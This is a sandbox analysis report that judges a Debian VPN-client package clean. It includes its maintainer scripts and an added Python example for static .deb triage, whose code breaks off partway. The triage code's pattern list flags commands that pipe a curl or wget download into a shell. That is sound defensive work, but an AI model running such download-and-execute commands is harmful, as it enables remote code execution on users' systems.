
Linux Analysis Report
SGNConnect_v5.0.20.deb

Overview

General Information

Sample name:SGNConnect_v5.0.20.deb
Analysis ID:1655141
MD5:8aa66ae2a690b14f05dcd0289714e99d
SHA1:32a4113918a775b59bc2273fc11c48bc62272e89
SHA256:7383858f6f991035ec2a43e70af6e103dc6bfc6e06c62e1d1474d638c8fb4867

Detection

Score:2
Range:0 - 100

Signatures

Creates hidden files and/or directories (the .uuid markers under the font directories and the entries under /root are written by the viewer processes exo-open and engrampa, not by anything from the package)
Executes the "rm" command used to delete files or directories (dpkg-deb removing its own temporary directory /tmp/dpkg-deb.7lBi6l)
Sample tries to set the executable flag (tar restoring the mode bits of postinst and prerm while unpacking the control archive)
Uses the "uname" system call to query kernel version information (possible evasion) (issued by exo-open, dbus-launch and engrampa, i.e. by the viewer, not by code from the package)
Writes shell script file to disk with an unusual file extension (postinst and prerm; Debian maintainer scripts carry no extension by convention, so this signature fires on any .deb that ships them)

Classification

Verdict: clean (score 2 of 100). None of the category labels of the classification ribbon (Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner) apply.
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1655141
Start date and time:2025-04-03 01:20:40 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 21s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:SGNConnect_v5.0.20.deb
Detection:CLEAN
Classification:clean2.linDEB@0/6@2/0
Command:xdg-open "/tmp/SGNConnect_v5.0.20.deb"
Note: xdg-open handed the file to the archive manager (engrampa), which only ran dpkg-deb -I and dpkg-deb -c. The package was never installed, so postinst and prerm were not executed and the CLEAN verdict covers a static look at the archive, not the behaviour of the services those scripts enable.
PID:5434
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process tree:
  • system is lnxubuntu20
  • exo-open (PID: 5446, Parent: 5434, MD5: 60a307a6a6325e2034eb5cc56bff1abd) Arguments: exo-open /tmp/SGNConnect_v5.0.20.deb
    • exo-open New Fork (PID: 5450, Parent: 5446)
    • dbus-launch (PID: 5450, Parent: 5446, MD5: 0b22a45154a51c6121bb1d208d8ab203) Arguments: dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
    • exo-open New Fork (PID: 5452, Parent: 5446)
      • exo-open New Fork (PID: 5453, Parent: 5452)
      • sh (PID: 5453, Parent: 2935, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh engrampa /tmp/SGNConnect_v5.0.20.deb
      • engrampa (PID: 5453, Parent: 2935, MD5: 39fede466e21a42b973e73b62cc7fc09) Arguments: engrampa /tmp/SGNConnect_v5.0.20.deb
        • engrampa New Fork (PID: 5456, Parent: 5453)
        • dbus-launch (PID: 5456, Parent: 5453, MD5: 0b22a45154a51c6121bb1d208d8ab203) Arguments: dbus-launch --autolaunch=ee49dfd4fa47433baee88884e2d7de7c --binary-syntax --close-stderr
        • engrampa New Fork (PID: 5464, Parent: 5453)
        • dpkg-deb (PID: 5464, Parent: 5453, MD5: 138cc2b338ff91da07bf7ad1ba786d25) Arguments: dpkg-deb -I /tmp/SGNConnect_v5.0.20.deb
          • dpkg-deb New Fork (PID: 5465, Parent: 5464)
          • dpkg-deb New Fork (PID: 5466, Parent: 5464)
          • dpkg-deb New Fork (PID: 5467, Parent: 5464)
          • tar (PID: 5467, Parent: 5464, MD5: 586e1b7caf47a43f5be28968dd4a7329) Arguments: tar -x -m -f - --warning=no-timestamp
          • dpkg-deb New Fork (PID: 5468, Parent: 5464)
          • rm (PID: 5468, Parent: 5464, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf -- /tmp/dpkg-deb.7lBi6l
        • engrampa New Fork (PID: 5469, Parent: 5453)
        • dpkg-deb (PID: 5469, Parent: 5453, MD5: 138cc2b338ff91da07bf7ad1ba786d25) Arguments: dpkg-deb -c /tmp/SGNConnect_v5.0.20.deb
          • dpkg-deb New Fork (PID: 5470, Parent: 5469)
          • dpkg-deb New Fork (PID: 5471, Parent: 5469)
          • dpkg-deb New Fork (PID: 5472, Parent: 5469)
          • tar (PID: 5472, Parent: 5469, MD5: 586e1b7caf47a43f5be28968dd4a7329) Arguments: tar -tv -f - --warning=no-timestamp
  • cleanup
No yara matches
No Suricata rule has matched

Signature results (no malicious signatures):

Network behaviour
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
(both are the A and AAAA lookups themselves, sent to the resolver 1.1.1.1 on port 53; see the network traffic tables below)
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
(daisy.ubuntu.com is the Ubuntu error-tracker endpoint queried by the analysis OS; no process from the package was running)

Classification
Source: classification engine | Classification label: clean2.linDEB@0/6@2/0

Creates hidden files and/or directories
Source: /usr/bin/exo-open (PID: 5446) | Directory: /root/.Xdefaults-galassia
Source: /usr/bin/exo-open (PID: 5446) | Directory: /root/.cache
Source: /usr/bin/engrampa (PID: 5453) | Directory: /root/.Xdefaults-galassia
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/local/share/fonts/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /root/.local/share/fonts/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /root/.fonts/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/X11/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cMap/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cmap/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/opentype/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/type1/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/X11/Type1/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/X11/encodings/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/X11/misc/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/X11/util/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cmap/adobe-cns1/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cmap/adobe-gb1/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cmap/adobe-japan1/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cmap/adobe-japan2/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/cmap/adobe-korea1/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/opentype/malayalam/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/opentype/mathjax/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/opentype/noto/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/opentype/urw-base35/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/Gargi/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/Gubbi/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/Nakula/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/Navilu/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/Sahadeva/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/Sarai/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/abyssinica/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/ancient-scripts/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/dejavu/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/droid/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-beng-extra/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-deva-extra/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-gujr-extra/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-guru-extra/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-kalapi/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-orya-extra/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-telu-extra/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/fonts-yrsa-rasa/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/freefont/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/kacst/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/kacst-one/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lao/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lato/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/liberation/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/liberation2/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-assamese/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-bengali/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-devanagari/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-gujarati/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-kannada/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-malayalam/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-oriya/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-punjabi/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-tamil/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-tamil-classical/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/lohit-telugu/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/malayalam/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/noto/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/openoffice/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/padauk/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/pagul/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/samyak/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/samyak-fonts/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/sinhala/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/tibetan-machine/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/tlwg/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/ttf-khmeros-core/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/truetype/ubuntu/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/type1/urw-base35/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /usr/share/fonts/X11/encodings/large/.uuid
Source: /usr/bin/engrampa (PID: 5453) | Directory: /root/.cache
Source: /usr/bin/tar (PID: 5467) | Directory: /tmp/dpkg-deb.7lBi6l/.

Executes the "rm" command used to delete files or directories
Source: /usr/bin/dpkg-deb (PID: 5468) | Rm executable: /usr/bin/rm -> rm -rf -- /tmp/dpkg-deb.7lBi6l

Sample tries to set the executable flag
Source: /usr/bin/tar (PID: 5467) | File: /tmp/dpkg-deb.7lBi6l/postinst (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/tar (PID: 5467) | File: /tmp/dpkg-deb.7lBi6l/prerm (bits: - usr: rx grp: rx all: rwx)
Source: /usr/bin/tar (PID: 5467) | File: /tmp/dpkg-deb.7lBi6l/. (bits: - usr: rx grp: rx all: rwx)

Writes shell script file to disk with an unusual file extension
Source: /usr/bin/tar (PID: 5467) | Writes shell script file to disk with an unusual file extension: /tmp/dpkg-deb.7lBi6l/postinst
Source: /usr/bin/tar (PID: 5467) | Writes shell script file to disk with an unusual file extension: /tmp/dpkg-deb.7lBi6l/prerm

Uses the "uname" system call to query kernel version information (possible evasion)
Source: /usr/bin/exo-open (PID: 5446) | Queries kernel information via 'uname'
Source: /usr/bin/dbus-launch (PID: 5450) | Queries kernel information via 'uname'
Source: /usr/bin/engrampa (PID: 5453) | Queries kernel information via 'uname'
Source: /usr/bin/dbus-launch (PID: 5456) | Queries kernel information via 'uname'
MITRE ATT&CK matrix (matched techniques only; number of matching signatures in parentheses)
Defense Evasion: File and Directory Permissions Modification (1); Hidden Files and Directories (1); File Deletion (1)
Discovery: Security Software Discovery (1)
Command and Control: Non-Application Layer Protocol (1); Application Layer Protocol (1)
No techniques matched under Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Credential Access, Lateral Movement, Collection, Exfiltration or Impact.
No configs have been found
Behavior Graph (ID: 1655141, Sample: SGNConnect_v5.0.20.deb, Startdate: 03/04/2025, Architecture: LINUX, Score: 2)
  • exo-open started exo-open and dbus-launch
  • exo-open started sh, which started engrampa
  • engrampa started dpkg-deb (twice) and dbus-launch
  • first dpkg-deb started tar and rm (plus two dpkg-deb forks); second dpkg-deb started tar (plus two dpkg-deb forks)
  • tar dropped /tmp/dpkg-deb.7lBi6l/prerm (POSIX) and /tmp/dpkg-deb.7lBi6l/postinst (POSIX)
  • network: DNS lookup of daisy.ubuntu.com

No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.24 | true | false | (none) | high
    No contacted IP infos
    Context for daisy.ubuntu.com (other Joe Sandbox samples that resolved the same name; the overlap comes from the shared Ubuntu analysis VM querying its error tracker, not from any relationship to this package):
    Associated Sample Name | Detection | Threat Name | Resolved IP
    xd.ppc.elf | malicious | Mirai | 162.213.35.24
    xd.arm6.elf | malicious | Mirai | 162.213.35.24
    .i.elf | malicious | Unknown | 162.213.35.25
    xd.x86_64.elf | malicious | Mirai | 162.213.35.24
    xd.arm.elf | malicious | Mirai | 162.213.35.25
    xd.m68k.elf | malicious | Mirai | 162.213.35.25
    xd.mips.elf | malicious | Mirai | 162.213.35.24
    xd.arm6.elf | malicious | Mirai | 162.213.35.24
    xd.arm6.elf | malicious | Mirai | 162.213.35.25
    xd.x86.elf | malicious | Mirai | 162.213.35.25
    No further context
    Process:/usr/bin/engrampa
    File Type:data
    Category:dropped
    Size (bytes):2
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:C4103F122D27677C9DB144CAE1394A66
    SHA1:1489F923C4DCA729178B3E3233458550D8DDDF29
    SHA-256:96A296D224F285C67BEE93C30F8A309157F0DAA35DC5B87E410B78630A09CFC7
    SHA-512:5EA71DC6D0B4F57BF39AADD07C208C35F06CD2BAC5FDE210397F70DE11D439C62EC1CDF3183758865FD387FCEA0BADA2F6C37A4A17851DD1D78FEFE6F204EE54
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:..
    Process:/usr/bin/tar
    File Type:ASCII text
    Category:dropped
    Size (bytes):53
    Entropy (8bit):4.357558369976583
    Encrypted:false
    SSDEEP:3:MteoiECAHRayqmr8SLv:roiUHIyqob
    MD5:DBFF7A958BC0F534D6008D58AF2BF3DE
    SHA1:9C8F94945CCDB4EF6A3AC649503D132A23A1CD6D
    SHA-256:DD9BC6ABAFE926437022DEEC8205C69C22503F743674980E5DCDA7934BF9B2AE
    SHA-512:75CD4EDC43BCDE7978A12EFDA690670DA77AFE2A99BD4FBF99AE26F3294A69215F9A515DEC1D25F6211189F48892482A45DF4EEE444E4471FFAAF1E9A20AB53A
    Malicious:false
    Reputation:low
    Preview:/etc/NetworkManager/dispatcher.d/10-check-dns-domain
    Process:/usr/bin/tar
    File Type:ASCII text, with very long lines (477)
    Category:dropped
    Size (bytes):784
    Entropy (8bit):5.142130985735185
    Encrypted:false
    SSDEEP:24:/XgnLzKHJW93wzIuu+9Q3BWiHxiK5MCXLjRMCX:/wnLzKH09IIYQRWIDMq/RMW
    MD5:F5D2940D7DF43F1304AC4842ED2A7E64
    SHA1:8334D3BAD104365B3A1BC9027909A3E76050853E
    SHA-256:C207A34F849A6674667DA8A4A69F8BDE883FD77F1689E4A099469E12F340CCE4
    SHA-512:381CA5ED9CD4F6043C2CCF543D4DB17AD53C506CFAD024FA2E38F352252C4AAABCAA3DA85612659CF72FD06C541A459F6E266C8AAA019BFED3B04E458DD12CBF
    Malicious:false
    Reputation:low
    Preview (line breaks restored; the raw preview shows them as "."):
    Package: sgnconnect
    Version: 5.0.20
    Architecture: amd64
    Maintainer: Todyl Support <support@todyl.com>
    Installed-Size: 207012
    Depends: zip, ca-certificates, libasio-dev, libnss3-tools, liblzo2-2, liblz4-1, libxcb-xinerama0, net-tools, openvpn, openvpn-systemd-resolved, qt5-image-formats-plugins, libc6 (>= 2.30), libgcc-s1 (>= 3.0), libqt5core5a (>= 5.15.1), libqt5gui5 (>= 5.8.0) | libqt5gui5-gles (>= 5.8.0), libqt5network5 (>= 5.0.2), libqt5svg5 (>= 5.6.0~beta), libqt5webenginecore5 (>= 5.7.1), libqt5webenginewidgets5 (>= 5.7.1), libqt5widgets5 (>= 5.2.0), libqt5xml5 (>= 5.0.2), libstdc++6 (>= 9)
    Section: net
    Priority: extra
    Description: Establish connections to the Secure Global Network (SGN)
     A lightweight client used to connect devices to the Secure Global Network (SGN).
    Process:/usr/bin/tar
    File Type:ASCII text
    Category:dropped
    Size (bytes):9491
    Entropy (8bit):5.002582166122907
    Encrypted:false
    SSDEEP:192:/2h3DcaBiy2mcPLDQP/XzK7vEgpHwW+BXy:YYaktmcjDQPPm7ZKw
    MD5:D51256D6333FE68FF48630ADE972BEDD
    SHA1:3ACEB50CD777FF9D3886A13BA8AB5AE1B33BCC65
    SHA-256:9A4645DFE628BBA9E61406507CB9E200E7165C7BA38EE4F3762872A5715CD8A6
    SHA-512:D715B8222B2DE4E978CA11C71A59AA9992AE6564CCF6E8E181D0B972CC4EB42C36166B29803A8728D0D0589F58828C9F56706725DC43D18F5B787814BC648D20
    Malicious:false
    Reputation:low
    Preview (line breaks restored; the raw preview shows them as "."):
    94043448bd393e4d0b1947d756de3bdd lib/systemd/system/sgnauditbeat.service
    ac18bd1469174ee983393b0b49e97437 lib/systemd/system/sgncore.service
    5d1e68542677bd2e8a8110464f571016 lib/systemd/system/sgnfilebeat.service
    2cb43ad2abb9aa4e5c32c76241a3c6d5 lib/systemd/system/sgnupdater.service
    df254e4e7dbe9d5b929bd1b8edeea634 lib/systemd/system/sgnwatchdog.service
    413c5e125d09262420baeacba1f6041a opt/sgnconnect/consoletodyl
    10bb737fccc73f6fd8f5eaed5e28b38d opt/sgnconnect/kibana/7/dashboard/749203a0-67b1-11ea-a76f-bf44814e437d.json
    007c55ee27834a02eb09fe200dee1e83 opt/sgnconnect/kibana/7/dashboard/Coredns-Overview-Dashboard.json
    56c6633ee4a2ea648fa383b903efd2c7 opt/sgnconnect/kibana/7/dashboard/Filebeat-Cisco-ASA.json
    69224cdd99c56d32966a38ed385acc3e opt/sgnconnect/kibana/7/dashboard/Filebeat-Envoyproxy-Overview.json
    ac871e097e18ee42335a72640aab5bd7 opt/sgnconnect/kibana/7/dashboard/Filebeat-IBMMQ-Overview.json
    d7b0043eae5f7cfc3efebe81da14eb7e opt/sgnconnect/kibana/7/dashboard/Filebeat
    (preview truncated)
    Process:/usr/bin/tar
    File Type:POSIX shell script, ASCII text executable
    Category:dropped
    Size (bytes):502
    Entropy (8bit):4.441739966294269
    Encrypted:false
    SSDEEP:12:GYQ+wPB4W2WxKTKl21lPaZgTKgUuPGMGkTKR:2fOGADlo8BTO
    MD5:392FBD5C7014D16B011CB18891F71341
    SHA1:F3B5DC6377DAC51E995FBE0D0FCB2C079EFBE909
    SHA-256:AAB2A0C11369779D7A645862D72A24C24A5D97957566247726F10711C03D5C73
    SHA-512:CC33097AB6B45B71646271DEC3470191DB9027E96A22CAD12A9AB76413A8BE9A11BFD5EE0E135A434C98F8A25B2F32B6DF2A6BCD08F6F9FB32B7B52D64A32BE1
    Malicious:false
    Reputation:low
    Preview (line breaks restored; the raw preview shows them as "."):
    #!/bin/sh

    # fix permissions
    chown -R root:root /opt/sgnconnect/sgnconnect

    # Create folders for core dumps
    mkdir -p /opt/sgnconnect/crashes/sgncore
    mkdir -p /opt/sgnconnect/crashes/sgnupdater
    mkdir -p /opt/sgnconnect/crashes/sgnwatchdog
    mkdir -p /opt/sgnconnect/crashes/sgnconnect

    systemctl enable sgncore.service
    systemctl enable sgnupdater.service
    systemctl enable sgnwatchdog.service

    systemctl start sgncore.service
    systemctl start sgnupdater.service
    systemctl start sgnwatchdog.service


    exit 0
    Process:/usr/bin/tar
    File Type:POSIX shell script, ASCII text executable
    Category:dropped
    Size (bytes):566
    Entropy (8bit):4.492250677892201
    Encrypted:false
    SSDEEP:12:ioiFGBQL7wAFv4bGDTKYggTKoN/pfzfqrFeFFeFIPt74H:NiFeQL7Dv4SnZg89N/pfzfC4FaIPCH
    MD5:B3AE4E5A5726BBF1DCA23740AFDF094E
    SHA1:510EE2BA7FEEF5B07248517438A6D310CA523CAA
    SHA-256:663218D5163743FCD49766EAB4372891ACD7353AAC3A8E227DAD60B1E7B078CB
    SHA-512:C0B254DCDCEB586D5BA65D0DF2BBF4AA1E2A93703348B45942D9553043C44583F2291EF1B7B6D3E5566B769B5E16A9EF15A35A933AB9EB91E8E0FEAF98B6C394
    Malicious:false
    Reputation:low
    Preview (line breaks restored; the raw preview shows them as "."):
    #!/bin/sh

    if [ "$1" = "upgrade" ]; then
    # Do nothing for upgrades
     exit 0
    else
     # Stop any gui processes
     killall sgnconnect

     # Stop services but only if not upgrading
     systemctl stop sgnwatchdog.service
     systemctl disable sgnwatchdog.service
     systemctl stop sgncore.service
     systemctl disable sgncore.service
     systemctl stop sgnupdater.service
     systemctl disable sgnupdater.service

     /opt/sgnconnect/sgncore --cleanup

     killall sgnauditbeat
     killall sgnfilebeat

     rm /opt/sgnconnect/data/SGN/SGN\ Connect.ini
    fi


    exit 0
    File type:Debian binary package (format 2.0), with control.tar.xz, data compression xz
    Entropy (8bit):7.999996207675499
    TrID:
    • Debian Linux Package (24024/1) 100.00%
    File name:SGNConnect_v5.0.20.deb
    File size:49'183'836 bytes
    MD5:8aa66ae2a690b14f05dcd0289714e99d
    SHA1:32a4113918a775b59bc2273fc11c48bc62272e89
    SHA256:7383858f6f991035ec2a43e70af6e103dc6bfc6e06c62e1d1474d638c8fb4867
    SHA512:4b5bb1a9626deee12cce7308a142af72e977c176ab4a973b4fc9bf70470ad7541920d9601b620e69472257659f84ea18698e67f3b9e5b0e6fca0a661d37f8677
    SSDEEP:786432:V/2Jb+Vupk2WAUD5Sxt0zPNLaPodwSj9MppcVcX4xd7/8JcZmsYaf3RebKVniIdp:V/oQupXODUx+zPN2AwSjIyJxd7UaX3RJ
    TLSH:23B73336BD3D473D23EE5812242EC91E9A90E749E2ADBC497664F509B3FC2342F57221
    File Content Preview:!<arch>.debian-binary 1633376706 0 0 100644 4 `.2.0.control.tar.xz 1633376706 0 0 100644 4028 `..7zXZ......F.......!.............O..q].....}....J>y...&.^....5...6..=../0.IDBgS$.(35....].y.........x...:..j.#..}.....T;<Mr
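The sandbox went no further than the two commands visible in the process tree: dpkg-deb -I (read the control archive) and dpkg-deb -c (list the payload). The following is an added example of the same static triage done offline, with the two checks this report never made: verifying the payload against the package's md5sums and reviewing the maintainer scripts instead of executing them. It is not code from Joe Sandbox or from the SGNConnect package. The sample package it builds (demo-agent, its paths, its service name) and the RISKY pattern list are constructed for the example; the patterns are seeded from what the postinst and prerm previews above actually contain.

```python
"""Offline triage of a .deb without installing it (added example; constructed sample)."""
from __future__ import annotations

import hashlib
import io
import re
import tarfile

# Maintainer-script commands that deserve a human look before `dpkg -i`.
# Assumption for this example, seeded from the report's postinst/prerm previews.
RISKY = [
    (r"^\s*systemctl\s+(enable|start)\b", "enables/starts a unit (persistence)"),
    (r"\bchown\s+-R\b", "recursive ownership change"),
    (r"^\s*killall\b", "kills processes by name"),
    (r"^\s*rm\s", "deletes files"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped into a shell"),
]


def parse_ar(blob: bytes) -> dict[str, bytes]:
    """A .deb is an ar(1) archive: 8-byte magic, then 60-byte member headers."""
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos, members = 8, {}
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError(f"bad ar header at offset {pos}")
        name = hdr[0:16].decode().rstrip(" /")   # GNU ar appends '/', dpkg does not
        size = int(hdr[48:58])
        members[name] = blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)            # members are padded to even offsets
    return members


def tar_files(members: dict[str, bytes], base: str) -> dict[str, bytes]:
    """Return {path: bytes} for control.tar.* or data.tar.* (gz/bz2/xz/plain)."""
    for name, data in members.items():
        if name == base or name.startswith(base + "."):
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
                return {re.sub(r"^\./", "", m.name): tf.extractfile(m).read()
                        for m in tf.getmembers() if m.isfile()}
    raise ValueError(f"missing {base} member")


def triage(deb: bytes) -> dict:
    members = parse_ar(deb)
    if members.get("debian-binary", b"").strip() != b"2.0":
        raise ValueError("unexpected debian-binary version")
    control = tar_files(members, "control.tar")   # what `dpkg-deb -I` reads
    data = tar_files(members, "data.tar")         # what `dpkg-deb -c` lists
    fields = dict(re.findall(r"^([A-Za-z-]+): (.*)$", control["control"].decode(), re.M))
    # md5sums lines are "<32 hex>  <path>"; every payload file should be listed.
    mismatched, unlisted = [], set(data)
    for line in control.get("md5sums", b"").decode().splitlines():
        digest, path = line[:32], line[34:]
        unlisted.discard(path)
        if hashlib.md5(data.get(path, b"")).hexdigest() != digest:
            mismatched.append(path)
    # Maintainer scripts run as root at install time: review them, never execute them.
    scripts = {}
    for name in ("preinst", "postinst", "prerm", "postrm"):
        if name in control:
            lines = control[name].decode(errors="replace").splitlines()
            scripts[name] = [(n, why, line.strip()) for n, line in enumerate(lines, 1)
                             for pat, why in RISKY if re.search(pat, line)]
    return {"package": fields.get("Package"), "version": fields.get("Version"),
            "depends": fields.get("Depends", ""), "payload": sorted(data),
            "md5_mismatch": mismatched, "unlisted": sorted(unlisted), "scripts": scripts}


def build_deb(control_files: dict[str, bytes], data_files: dict[str, bytes]) -> bytes:
    """Assemble a minimal format-2.0 .deb (ar container + two xz tarballs) for testing."""
    def tar_xz(files: dict[str, bytes]) -> bytes:
        buf = io.BytesIO()
        with tarfile.open(fileobj=buf, mode="w:xz") as tf:
            for path, content in files.items():
                info = tarfile.TarInfo("./" + path)
                info.size, info.mode = len(content), 0o755
                tf.addfile(info, io.BytesIO(content))
        return buf.getvalue()

    def member(name: str, content: bytes) -> bytes:
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(content):<10}`\n".encode()
        return hdr + content + (b"\n" if len(content) % 2 else b"")

    return (b"!<arch>\n" + member("debian-binary", b"2.0\n")
            + member("control.tar.xz", tar_xz(control_files))
            + member("data.tar.xz", tar_xz(data_files)))


# Constructed sample modelled on the report's postinst/prerm; not the real package.
SAMPLE_DATA = {
    "opt/demo/demo": b"#!/bin/sh\necho agent\n",
    "lib/systemd/system/demo.service": b"[Service]\nExecStart=/opt/demo/demo\n",
}
SAMPLE_CONTROL = {
    "control": b"Package: demo-agent\nVersion: 1.0\nArchitecture: amd64\nDepends: openvpn\n",
    "md5sums": "".join(f"{hashlib.md5(c).hexdigest()}  {p}\n" for p, c in SAMPLE_DATA.items()).encode(),
    "postinst": b"#!/bin/sh\nchown -R root:root /opt/demo\nsystemctl enable demo.service\nsystemctl start demo.service\nexit 0\n",
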